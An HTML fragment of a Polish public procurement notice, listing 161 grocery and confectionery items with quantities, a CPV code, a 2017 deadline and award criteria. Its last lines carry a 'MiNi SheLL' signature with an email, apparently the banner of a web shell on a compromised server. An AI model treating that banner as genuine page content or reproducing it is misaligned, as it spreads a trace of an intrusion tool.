              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>
                  
                <b>Nazwa: </b><br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>LP.	WYSZCZEGÓLNIENIE
TOWARU	JEDNOSTKA MIARY	ILOŚĆ 	CENA JEDNOSTKOWA BRUTTO
( ZŁ)	WARTOŚĆ BRUTTO
( ZŁ)
1.	Fasola biała Jaś w opakowaniach 5 kg lub 10 kg	kg	150		
2.	Fasola kolorowa w opakowaniach 5 kg lub 10 kg	kg	50		
3.	Groch łuskany w opakowaniach
 5 kg lub 10 kg 	kg	150		
4.	Kasza gryczana prażona op. 1 kg	kg 	150		
5.	Kasza jaglana op. 1 kg 	kg 	50		
6.	Kasza jęczmienna średnia	kg	320		
7.	Kasza manna
z Młyna w Stoisławiu	kg	320		
8.	Kleik ryżowy 180 g
Bobovita lub równoważne 	szt	5		
9.	Kluski na parze 300 g - buchty	szt	50		
10.	Kolendra  cała 20 g ( Prymat lub równoważne)	szt	20		
11.	Konserwy drobiowe 130 g 
( Drosed lub równoważne)	szt	400		
12.	Konserwy turystyczne 130 g	szt	500		
13	Konserwy tyrolskie 130 g	szt	500		
14.	Mak - luzem	kg	40		
15.	Makaron- cienkie nitki 	kg	200		
16.	Makaron- łazanki, wstęgi, muszelki, świderki, kolanka, zacierki,	kg	550		
17.	Makaron w kształcę ryżu	kg	50		
18.	Mąka pszenna typ 450 
opak. 1 kg	kg	1000		
19.	 Mąka razowa z otrębami ( żytnia)	kg	100		
20.	Miodziki jednorazowe 25 g 	szt.	30		
21.	Miód prawdziwy 400 g	szt.	10		
22.	Olej uniwersalny  3 l	szt. 	250		
23.	Orzechy włoskie 100 g
Kresto lub równoważne 	szt	100		
24.	Orzechy włoskie łuskane	kg	2		
25.	Pasztet drobiowy w puszce 160 g 
Drosed lub równoważny  	szt	1200		
26.	Płatki owsiane górskie  500 g 	
kg	
150		
27.	Ryż opak. 1 kg	kg	900		
28.	Soczki małe 0,2 l w kartoniku- różne smaki	szt	550		
29.	Soki owocowe 1 l w kartonie
Tymbark, Tortex lub równoważne 	szt	80		
30.	Sucharki  - paczka 450 g  	szt	20		
31.	Wafle ryżowe naturalne  
paczka 130 g	szt	20		
32.	Ananas w puszce  565 g 
Kier , MK lub równoważne 	szt.	200		
33.	Brzoskwinie w syropie
 w pusze  850 g  Kier
 lub równoważne 	szt.	200		
34.	Budyń 40 g różne smaki- 
Winiary, Gellwe lub równoważne 	szt.	1000		
35.	Chipsy cebulowe 250g	szt	20		
36.	Chipsy paprykowe 250g.	szt	20		
37.	Chrupki orzechowe 250g	szt	20		
38.	Chrupki paprykowe 250g	szt.	20		
39.	Chrzan tarty 160g	szt.	400		
40.	Cukier 1 kg-  biały kryształ	kg	2000		
41.	Cukier puder- 500 g 
Diamont lub równoważne	kg	5		
42.	Dżem niskosłodzony  
260 g różne smaki	szt.	300		
43.	Dżem wysokosłodzony  
260 g różne smaki	szt.	300		
44.	Dżemiki jednorazowe 25g	kg	50		
45.	Galaretka 75g różne smaki
Winiary, Gellwe lub równoważne	szt.	900		
46.	Groszek konserwowy tradycyjny 400 g, Pudliszki, Kwidzyn 
lub równoważne	szt.	20		
47.	Jabłka suszone 	kg	10		
48.	Kawa zbożowa w opk. 500 g	kg	100		
49.	Ketchup pikantny 500g
Tortex, Kotlin lub równoważne 	szt.	30		
50.	Ketchup łagodny 500g
Dawtona, Tortex lub równoważne 	szt	40		
51.	Kisiel 75g  różne smaki  Winiary, Gellwe, lub równoważne	szt.	50		
52.	Kokos wiórki	kg	4		
53.	Kokos 100 g w opak.	szt	100		
54.	Koncentrat  pomidorowy 970 g , Pudliszki lub równoważne 	szt	350		
55.	Kremy do tortów 120 g- różne	szt	30		
56.	Kukurydza   w puszce 400 g, Dawtona , Kwidzyn lub równoważne 	szt	80		
57.	Majeranek luzem 	kg	8		
58.	Mąka ziemniaczana opak.  1 kg	kg	200		
59.	Migdały 	kg	2		
60.	Migdały  100 g 
Kresto lub równoważne	szt	200		
61.	Miód sztuczny 370 g	szt.	6		
62.	Morele suszone	kg	5		
63.	Ogórki konserwowe  słoik 1 l  
Rolnik, Krakus lub równoważne 	szt.	100		
64.	Oliwki czarne bezpestkowe 
900 g, Pudliszki lub równoważne 	szt.	3		
65.	Oliwki zielone bezpestkowe 
900 g, Pudliszki lub równoważne 	szt.	3		
66.	Pieczarki marynowane 370 ml
Rolnik lub równoważne 	szt.	10		
67.	Pieprz ziołowy luzem	kg	3		
68.	Przyprawa do drobiu 	kg	4		
69.	Przyprawa do zup płynie  1 l,
Winiary lub równoważne 	szt.	400		
70.	Przyprawa Kucharek  1 kg Warzywko lub równoważne	szt.	640		
71.	Rodzynki luzem 	kg	10		
72.	Rodzynki  100 g-
Kresto lub równoważne 	szt.	200		
73.	Sos do spaghetti w proszku  	szt.	20		
74.	Syrop malinowy 500 ml	szt.	200		
75.	Śliwka suszona 	kg	10		
76.	Śmietana  Fix w proszku 	szt.	30		
77.	Śmietana  w proszku  55 g
Śnieżka lub równoważne	szt.	20		
78.	Śmietanka 80 g 
Cremona lub równoważne	szt.	100		
79.	Zaprawa cytrynowa  1 l
Cytrynka lub równoważne 	szt.	100		
80.	Zioła prowansalskie 	kg	1		
81.	Zupa w proszku grochowa, pomidorowa 	kg	10		
82.	Zupa w proszku grochowa, pomidorowa  36 g	szt.	30		
83.	Żelatyna wieprzowa  50 g 	szt.	70		
84.	Aromat do ciast  10 ml
Delecta lub równoważne 	szt.	12		
85.	Baton czekoladowy 50 g
Ikar lub równoważne 	szt.	300		
86.	Baton czekoladowy - 50 g
Danusia lub równoważne 	szt.	300		
87.	Baton w czekoladzie  50 g
Maciek lub równoważne 	szt.	
300
		
88.	Bombonierka w czekoladzie 228g Solidarność lub równoważne 	szt.	10		
89.	Bombonierka w czekoladzie 300g 
(Wedel, Goplana, Mieszko, Solidarność lub równoważne) 	szt.	10		
90.	Ciastka  delicje  147 g	szt.	150		
91.	Ciastka biszkopty luzem	kg	30		
92.	Ciastka czekoladowe luzem  różne 	kg	10		
93.	Ciastka korzenne  op. 2,5 kg	szt.	3		
94.	Ciastka kruche rogaliki z marmoladą  	kg	5		
95.	Ciastka kruche deserowe z cukrem 	kg	15		
96.	Ciastka kruche kocie oczka	kg	3		
97.	Ciastka kruche markizy 	kg	20		
98.	Ciastka kruche maślane 	kg	5		
99.	Ciastka kruche rozetki pudrowe 	kg	5		
100	Ciastka kruche ślimaki z marmoladą	kg	3		
101	Ciastka kruche z marmoladą 	kg	20		
102	Ciastka kruche z maszynki	kg	3		
103	Cukier waniliowy  16 g
Dr Oetker lub równoważne 	szt.	100		
104	Cukierki landryny  100 g	szt.	20		
105	Cukierki  jajeczka w czekoladzie-	kg	10		
106	Cukierki w czekoladzie
 Michałki, lub równoważne 	kg	30		
107	Cukierki w czekoladzie- 
 Mieszanka Krakowska,
 lub równoważne 	kg	30		
108	Cukierki w czekoladzie- trufle	kg	15		
109	 Cukierki zwykłe 	kg	20		
110	Cynamon luzem 	kg	4		
111	Czekolada dla cukrzyków -100 g	szt.	20		
112	Czekolada mleczna, gorzka 100 g	szt.	400		
113	Czekolada w proszku -1 kg
Milka lub równoważne 	szt.	1		
114	Czekolada nadziewana -100 g  różne smaki  miętowa, jagodowa truskawkowa, Wawel, Wedel, Goplana lub równoważne 	szt.	200		
115	Drożdże 100 g	szt.	20		
116	Gałka muszkatałowa 100 g	szt.	15		
117	Herbata owocowa ( 20 saszetek)	opak 	30		
118	Herbata ekspresowa ( 100 szt)
Saga, lub równoważne 	opak 	200		
119	Herbata granulowana indyjska 
80 g	opak 	1500		
120	 Herbata ziołowa  mięta, melisa (20 saszetek )	opak 	20		
121	Herbatniki  148 g - Krakuski, Łakotki lub równoważne 	opak 	100		
122	 Kakao  100 g Wawel, Decomoreno lub równoważne 	szt.	120		
123	Kawa naturalna  100 g
Prima, Gala lub równoważne 	szt.	600		
124	Kawa naturalna 250 g
Mk, Premium lub równoważne 	szt.	360		
125	Kawa rozpuszczalna 100 g 
Nescafe lub równoważne 	szt.	80		
126	Kminek mielony 	kg	2		
127	Kocie języczki 100 g
lub równoważne 	szt.	5		
128	Krakersy Mix koktajlowe 200 g 	szt.	50		
129	Krakersy prostokątne 180 g Lajkonik lub równoważne 	szt.	50		
130	Krem czekoladowy 350 g 
 Nutella lub równoważne 	szt.	60		
131	Liść laurowy luzem 	kg	2		
132	Lizaki 	szt.	200		
133	Musztarda łagodna, ostra 	szt.	300		
134	Ocet spirytusowy  1 l 	szt	200		
135	Oregano 500 g	op.	1		
136	Orzechy laskowe w czekoladzie 80 g, Jutrzenka lub równoważne 	szt.	100		
137	Paluszki solone 80 g	szt.	50		
138	Papryka słodka w proszku 	kg	 4		
139	Pastylki miętowe w czekoladzie
210 g-Wawel lub równoważne  	szt.	10		
140	Pieprz czarny mielony luzem	kg	 6		
141	Pierniki lukrowane luzem 	kg	50		
142	Pierniki w czekoladzie luzem 	kg	60		
143	Płatki kukurydziane  Corn Flakes  1 kg  
Nestle, Lubella lub równioważne 	szt.	20		
144	Proszek do pieczenia 16 g
Dr Oetker lub równoważne 	szt.	30		
145	Przyprawa korzenna 20 g
Prymat lub równoważne 	szt.	10		
146	Ptasie Mleczko, Milka  350g,  smak śmietankowy, waniliowym
lub równoważne 	szt.	10		
147	Rafaello kokosowe, Smakołyk  150 g lub równoważne 	szt.	5		
148	Rodzynki w czekoladzie 100 g
Jutrzenka lub równoważne 	szt.	100		
140	Rogalik 80g z nadzieniem waniliowym, czekoladowym, truskawkowym -7 Days, Duble max, Croissant lub równoważne 	szt.	100		
150	Rurki suche i nadziewane 2,5 kg
Cemar lub równoważne 	szt.	5		
151	Soda oczyszczona 15 g	szt.	10		
152	Sól spożywcza 1 kg 	szt.	500		
153	Tortilla  30 cm  18 szt.	op. 	20		
154	Tymianek 1 kg 	op. 	1		
155	Wafelek w czekoladzie  23 kg
Elitess  Skawa lub równoważne 	szt.	100		
156	Wafelki w czekoladzie -50 g
Góralki, Grześki, Princessa, Prince Polo  lub równoważne 	szt.	1000		
157	Woda gazowana 0,5 l	szt.	100		
158	Woda gazowana 1,5 l	szt.	150		
159	Woda niegazowana 0,5 l	szt.	250		
160	Woda niegazowana 1,5 l	szt.	250		
161	Ziele angielskie luz	kg	 6		
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15000000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>60</td></tr><tr><td>termin płatności faktur</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com